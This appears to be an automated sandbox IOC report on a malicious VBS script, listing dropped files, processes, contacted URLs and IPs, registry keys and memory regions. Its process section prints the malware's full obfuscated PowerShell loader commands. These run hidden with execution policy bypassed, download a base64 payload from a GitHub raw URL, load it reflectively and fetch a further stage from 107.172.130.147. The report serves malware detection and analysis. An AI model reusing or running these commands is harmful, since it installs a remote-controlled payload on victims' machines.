IOC Report
2THp7fwNQD.vbs

loading gif

Files

File Path
Type
Category
Malicious
2THp7fwNQD.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5vpljo5.x3n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdile2in.kkw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smtk15xl.sry.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn3lldqo.qmf.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.111.133
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://raw.githubusercontent.com
unknown
http://107.172.130.147
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://microsoft.co
unknown
https://go.micro
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
http://raw.githubusercontent.com
unknown
https://contoso.com/Icon
unknown
http://107.172.130.147/500/RSSTT.txt
107.172.130.147
https://raw.githubusercont
unknown
https://aka.ms/pscore6
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
raw.githubusercontent.com
185.199.111.133

IPs

IP
Domain
Country
Malicious
107.172.130.147
unknown
United States
185.199.111.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFE165E6000
trusted library allocation
page read and write
240C8430000
heap
page read and write
240CA1DA000
heap
page read and write
D8285B7000
stack
page read and write
E3AFE78000
stack
page read and write
2072C95B000
trusted library allocation
page read and write
2072B408000
trusted library allocation
page read and write
240CA2B1000
heap
page read and write
240CA445000
heap
page read and write
1F9F2A66000
heap
page read and write
20743130000
heap
page read and write
E3AFEF9000
stack
page read and write
1F9F2B87000
heap
page execute and read and write
E3B00FF000
stack
page read and write
D827FFE000
stack
page read and write
1F9F3050000
heap
page read and write
2072C02D000
trusted library allocation
page read and write
20729042000
heap
page read and write
7FFE16830000
trusted library allocation
page read and write
1F9DA9B3000
trusted library allocation
page read and write
240CA363000
heap
page read and write
20729084000
heap
page read and write
240CA21E000
heap
page read and write
1F9D8A99000
heap
page read and write
207292C0000
heap
page read and write
240C847A000
heap
page read and write
E3AFDF7000
stack
page read and write
240CA1E1000
heap
page read and write
7FFE16870000
trusted library allocation
page read and write
1F9D8A30000
heap
page read and write
7FFE16730000
trusted library allocation
page read and write
E3AFBFE000
stack
page read and write
240CA290000
heap
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
7FFE165D6000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
1F9D8B16000
heap
page read and write
1F9F2B80000
heap
page execute and read and write
D827F7E000
stack
page read and write
240C84DD000
heap
page read and write
1F9DA9B6000
trusted library allocation
page read and write
1F9D89E0000
heap
page read and write
1F9D8B18000
heap
page read and write
1F9D8A35000
heap
page read and write
20743510000
heap
page read and write
2073C03B000
trusted library allocation
page read and write
2074303C000
heap
page read and write
240CA351000
heap
page read and write
2072B413000
trusted library allocation
page read and write
2072CAD4000
trusted library allocation
page read and write
1F9DA937000
trusted library allocation
page read and write
240CA290000
heap
page read and write
240C85C0000
heap
page read and write
240CA381000
heap
page read and write
7FFE16740000
trusted library allocation
page read and write
207430E5000
heap
page read and write
7FFE16830000
trusted library allocation
page read and write
207432FE000
heap
page read and write
7FFE16840000
trusted library allocation
page read and write
240C84D1000
heap
page read and write
240CA1B0000
heap
page read and write
1F9DAC14000
trusted library allocation
page read and write
240CA233000
heap
page read and write
207292D0000
trusted library allocation
page read and write
240CA1FB000
heap
page read and write
2072C9A6000
trusted library allocation
page read and write
7FFE16520000
trusted library allocation
page read and write
7FFE16750000
trusted library allocation
page read and write
1F9EA8A1000
trusted library allocation
page read and write
7FFE166C9000
trusted library allocation
page read and write
2072903A000
heap
page read and write
7FFE16540000
trusted library allocation
page read and write
2072C41C000
trusted library allocation
page read and write
E3B007E000
stack
page read and write
240CA1C2000
heap
page read and write
240CA331000
heap
page read and write
1F9F2A11000
heap
page read and write
7FFE16760000
trusted library allocation
page read and write
D82847E000
stack
page read and write
1F9DA9C4000
trusted library allocation
page read and write
1F9D8900000
heap
page read and write
1F9F29F6000
heap
page read and write
2072C987000
trusted library allocation
page read and write
240CA338000
heap
page read and write
1F9D8AD8000
heap
page read and write
2072CD2F000
trusted library allocation
page read and write
240CA348000
heap
page read and write
240CA290000
heap
page read and write
240CA290000
heap
page read and write
1F9DA890000
heap
page read and write
7FFE166DA000
trusted library allocation
page read and write
1F9DA9B0000
trusted library allocation
page read and write
D82883E000
stack
page read and write
20729000000
heap
page read and write
1F9EA8B0000
trusted library allocation
page read and write
20729048000
heap
page read and write
E3AFC7E000
stack
page read and write
7FFE16702000
trusted library allocation
page read and write
240CA212000
heap
page read and write
20729086000
heap
page read and write
20729040000
heap
page read and write
1F9DA8BB000
trusted library allocation
page read and write
1F9F29B0000
heap
page read and write
D82930E000
stack
page read and write
7FFE165EC000
trusted library allocation
page execute and read and write
240CA264000
heap
page read and write
E3AFF7E000
stack
page read and write
207292C5000
heap
page read and write
240CA23F000
heap
page read and write
1F9F2A6C000
heap
page read and write
7FFE16820000
trusted library allocation
page read and write
1F9DA90A000
trusted library allocation
page read and write
240CA1B2000
heap
page read and write
E3AFA7F000
stack
page read and write
240CA1BA000
heap
page read and write
1F9DAEA6000
trusted library allocation
page read and write
7FFE168E3000
trusted library allocation
page read and write
7FFE16533000
trusted library allocation
page execute and read and write
1F9DAEB0000
trusted library allocation
page read and write
2072B243000
trusted library allocation
page read and write
D8284F9000
stack
page read and write
E3AFD79000
stack
page read and write
20728FA0000
heap
page read and write
1F9D8AEE000
heap
page read and write
D82853F000
stack
page read and write
240CA290000
heap
page read and write
240CA363000
heap
page read and write
240C83F0000
heap
page read and write
240C847A000
heap
page read and write
7FFE16720000
trusted library allocation
page execute and read and write
2072B415000
trusted library allocation
page read and write
240CA22B000
heap
page read and write
7FFE16540000
trusted library allocation
page read and write
7FFE16534000
trusted library allocation
page read and write
7FFE16860000
trusted library allocation
page read and write
240CA21B000
heap
page read and write
EADF0FA000
stack
page read and write
1F9DAD94000
trusted library allocation
page read and write
240C84DD000
heap
page read and write
20729230000
trusted library allocation
page read and write
240C83D0000
heap
page read and write
2073B63B000
trusted library allocation
page read and write
7FFE16850000
trusted library allocation
page read and write
7FFE16770000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
D82873F000
stack
page read and write
240C841A000
heap
page read and write
240CA290000
heap
page read and write
240CA1E1000
heap
page read and write
240CA1FD000
heap
page read and write
7FFE16910000
trusted library allocation
page read and write
240CA290000
heap
page read and write
1F9F2A94000
heap
page read and write
E3AFDFE000
stack
page read and write
207292CA000
heap
page read and write
EADFAFB000
stack
page read and write
240CA322000
heap
page read and write
240CA1CE000
heap
page read and write
240CA381000
heap
page read and write
7FFE165E0000
trusted library allocation
page read and write
7FFE16840000
trusted library allocation
page read and write
20729009000
heap
page read and write
20729210000
trusted library allocation
page read and write
240CA238000
heap
page read and write
7FFE167A0000
trusted library allocation
page read and write
240CA20F000
heap
page read and write
7FFE16524000
trusted library allocation
page read and write
7FFE16750000
trusted library allocation
page read and write
240C8427000
heap
page read and write
2073B31B000
trusted library allocation
page read and write
207290C5000
heap
page read and write
240C83B0000
heap
page read and write
2072B44F000
trusted library allocation
page read and write
EADF5FE000
stack
page read and write
20729240000
heap
page readonly
7FFE16616000
trusted library allocation
page execute and read and write
D8282FD000
stack
page read and write
D827EF3000
stack
page read and write
7FFE16720000
trusted library allocation
page read and write
240CA275000
heap
page read and write
7FFE165F0000
trusted library allocation
page execute and read and write
1F9DA9C1000
trusted library allocation
page read and write
240CA1C7000
heap
page read and write
240CA1D5000
heap
page read and write
7FFE168C3000
trusted library allocation
page read and write
2072B62D000
trusted library allocation
page read and write
240CA330000
heap
page read and write
20743150000
heap
page read and write
7FFE16780000
trusted library allocation
page read and write
E3AFFFE000
stack
page read and write
240CA1B1000
heap
page read and write
20743270000
heap
page read and write
207432BC000
heap
page read and write
7FFE16730000
trusted library allocation
page read and write
7FFE167D0000
trusted library allocation
page read and write
20728FC0000
heap
page read and write
D8287BE000
stack
page read and write
240C8426000
heap
page read and write
EADF1FE000
stack
page read and write
240CA267000
heap
page read and write
207292F0000
heap
page execute and read and write
1F9D8B59000
heap
page read and write
D82938D000
stack
page read and write
7FFE168B0000
trusted library allocation
page read and write
240C8486000
heap
page read and write
D8283FE000
stack
page read and write
7FFE16780000
trusted library allocation
page read and write
EADF2FE000
stack
page read and write
7FFE16710000
trusted library allocation
page execute and read and write
240CA325000
heap
page read and write
240CA323000
heap
page read and write
7FFE16760000
trusted library allocation
page read and write
7FFE167B0000
trusted library allocation
page read and write
240CA290000
heap
page read and write
1F9D8A00000
heap
page read and write
240CA1EE000
heap
page read and write
7FFE16650000
trusted library allocation
page execute and read and write
240CA22E000
heap
page read and write
20743660000
trusted library section
page read and write
7FFE1657C000
trusted library allocation
page execute and read and write
240CA339000
heap
page read and write
7FFE16860000
trusted library allocation
page read and write
7FFE16800000
trusted library allocation
page read and write
2072C725000
trusted library allocation
page read and write
1F9F2AB0000
heap
page execute and read and write
E3B017C000
stack
page read and write
240CA3B0000
heap
page read and write
2072B010000
heap
page execute and read and write
240CA363000
heap
page read and write
E3AF78E000
stack
page read and write
1F9DA8A1000
trusted library allocation
page read and write
207432D7000
heap
page read and write
240CA1BD000
heap
page read and write
240CA230000
heap
page read and write
1F9F2C90000
heap
page read and write
7FFE16606000
trusted library allocation
page execute and read and write
20728F90000
heap
page read and write
2073B021000
trusted library allocation
page read and write
1F9D8AD4000
heap
page read and write
207430FE000
heap
page read and write
7FFE166D9000
trusted library allocation
page read and write
7FFE167F0000
trusted library allocation
page read and write
240C9E60000
heap
page read and write
240CA1B4000
heap
page read and write
1F9F29FC000
heap
page read and write
240CA1C9000
heap
page read and write
7FFE1653B000
trusted library allocation
page read and write
E3AF7CE000
stack
page read and write
1F9DAD6B000
trusted library allocation
page read and write
20729300000
heap
page read and write
240CA384000
heap
page read and write
7FFE1654B000
trusted library allocation
page read and write
7FFE16523000
trusted library allocation
page execute and read and write
7FFE16640000
trusted library allocation
page execute and read and write
2073B092000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
240CA290000
heap
page read and write
2072AE70000
heap
page read and write
2072B539000
trusted library allocation
page read and write
7FFE168A0000
trusted library allocation
page read and write
2074307E000
heap
page read and write
7FFE166D0000
trusted library allocation
page read and write
7FFE16850000
trusted library allocation
page read and write
240C84D2000
heap
page read and write
240CA3B1000
heap
page read and write
240CA257000
heap
page read and write
240CA290000
heap
page read and write
240CA233000
heap
page read and write
2072903C000
heap
page read and write
240C84DD000
heap
page read and write
7FFE1653D000
trusted library allocation
page execute and read and write
2072B425000
trusted library allocation
page read and write
7FFE168EB000
trusted library allocation
page read and write
7FFE166EA000
trusted library allocation
page read and write
240CA339000
heap
page read and write
7FFE16522000
trusted library allocation
page read and write
240CA444000
heap
page read and write
1F9EA912000
trusted library allocation
page read and write
240CA363000
heap
page read and write
1F9D8A90000
heap
page read and write
1F9DA9FD000
trusted library allocation
page read and write
1F9DA350000
trusted library allocation
page read and write
7FFE166D1000
trusted library allocation
page read and write
7FFE1652D000
trusted library allocation
page execute and read and write
2072C70C000
trusted library allocation
page read and write
1F9F2A9E000
heap
page read and write
240CA1BD000
heap
page read and write
1F9DA8EC000
trusted library allocation
page read and write
2072CC66000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
240CA267000
heap
page read and write
7FFE16712000
trusted library allocation
page read and write
EADF8FE000
stack
page read and write
240C84D0000
heap
page read and write
2072B0A1000
trusted library allocation
page read and write
240CA1B2000
heap
page read and write
240CA1B9000
heap
page read and write
1F9F2BB0000
heap
page read and write
20743240000
heap
page execute and read and write
7FFE16700000
trusted library allocation
page execute and read and write
2072C712000
trusted library allocation
page read and write
7FFE16880000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
2073B030000
trusted library allocation
page read and write
E3AF683000
stack
page read and write
1F9DA9C7000
trusted library allocation
page read and write
E3AFAFE000
stack
page read and write
7FFE167A0000
trusted library allocation
page read and write
240CA290000
heap
page read and write
7FFE167F0000
trusted library allocation
page read and write
240CA290000
heap
page read and write
1F9D8A50000
heap
page read and write
1F9D8ADD000
heap
page read and write
240CA1FA000
heap
page read and write
1F9F2A74000
heap
page read and write
7FFE16532000
trusted library allocation
page read and write
7FFE165D0000
trusted library allocation
page read and write
240CA339000
heap
page read and write
7FFE166E0000
trusted library allocation
page execute and read and write
20729250000
trusted library allocation
page read and write
2072B421000
trusted library allocation
page read and write
D82863D000
stack
page read and write
7FFE166C0000
trusted library allocation
page read and write
2072C732000
trusted library allocation
page read and write
240CA1E6000
heap
page read and write
1F9D8B64000
heap
page read and write
7FFE16770000
trusted library allocation
page read and write
1F9DA8F1000
trusted library allocation
page read and write
240CA1DE000
heap
page read and write
240CA1D3000
heap
page read and write
1F9DA370000
trusted library allocation
page read and write
1F9DA870000
heap
page execute and read and write
240CA25C000
heap
page read and write
240C841B000
heap
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
1F9DA330000
trusted library allocation
page read and write
D82893B000
stack
page read and write
240CA1BA000
heap
page read and write
2072C736000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
207432A2000
heap
page read and write
240CA25F000
heap
page read and write
240C8486000
heap
page read and write
240CA350000
heap
page read and write
7FFE16870000
trusted library allocation
page read and write
2072C762000
trusted library allocation
page read and write
7FFE167D0000
trusted library allocation
page read and write
7FFE16890000
trusted library allocation
page read and write
207292F7000
heap
page execute and read and write
240CA24B000
heap
page read and write
2072B021000
trusted library allocation
page read and write
20729305000
heap
page read and write
E3AF70E000
stack
page read and write
240CA227000
heap
page read and write
240CA1E9000
heap
page read and write
240CA32E000
heap
page read and write
7FFE168C1000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
E3AFCFF000
stack
page read and write
2072C75B000
trusted library allocation
page read and write
EADF4FF000
stack
page read and write
7FFE16530000
trusted library allocation
page read and write
2072C9E5000
trusted library allocation
page read and write
EADF9FF000
stack
page read and write
2072AE8C000
heap
page read and write
7FFE167B0000
trusted library allocation
page read and write
7FFE166D2000
trusted library allocation
page read and write
7FFE166E1000
trusted library allocation
page read and write
240CA348000
heap
page read and write
240CA345000
heap
page read and write
207291D0000
heap
page read and write
E3AFB7D000
stack
page read and write
240CA269000
heap
page read and write
2072CD2B000
trusted library allocation
page read and write
240CA2B0000
heap
page read and write
240CA290000
heap
page read and write
2074307C000
heap
page read and write
240C82D0000
heap
page read and write
D82837F000
stack
page read and write
EADF7FE000
stack
page read and write
D8288BF000
stack
page read and write
7DF498140000
trusted library allocation
page execute and read and write
240CA1BF000
heap
page read and write
240CA250000
heap
page read and write
7FFE16900000
trusted library allocation
page read and write
7FFE165DC000
trusted library allocation
page execute and read and write
7FFE167C0000
trusted library allocation
page read and write
2074328B000
heap
page read and write
1F9DADD9000
trusted library allocation
page read and write
240CA244000
heap
page read and write
1F9DA3D0000
heap
page read and write
20729280000
trusted library allocation
page read and write
7FFE16800000
trusted library allocation
page read and write
D8286B8000
stack
page read and write
1F9F2A0F000
heap
page read and write
7FFE166E4000
trusted library allocation
page read and write
240CA26E000
heap
page read and write
240CA344000
heap
page read and write
D82827E000
stack
page read and write
1F9DA360000
heap
page readonly
240CA270000
heap
page read and write
2072905C000
heap
page read and write
1F9DAD9A000
trusted library allocation
page read and write
7FFE16820000
trusted library allocation
page read and write
240CA1F5000
heap
page read and write
240C85C5000
heap
page read and write
1F9DA3D6000
heap
page read and write
20743020000
heap
page read and write
7FFE167C0000
trusted library allocation
page read and write
1F9F2CA9000
heap
page read and write
1F9DA9B9000
trusted library allocation
page read and write
7FFE168F0000
trusted library allocation
page read and write
1F9D8ACE000
heap
page read and write
2072B449000
trusted library allocation
page read and write
There are 404 hidden memdumps, click here to show them.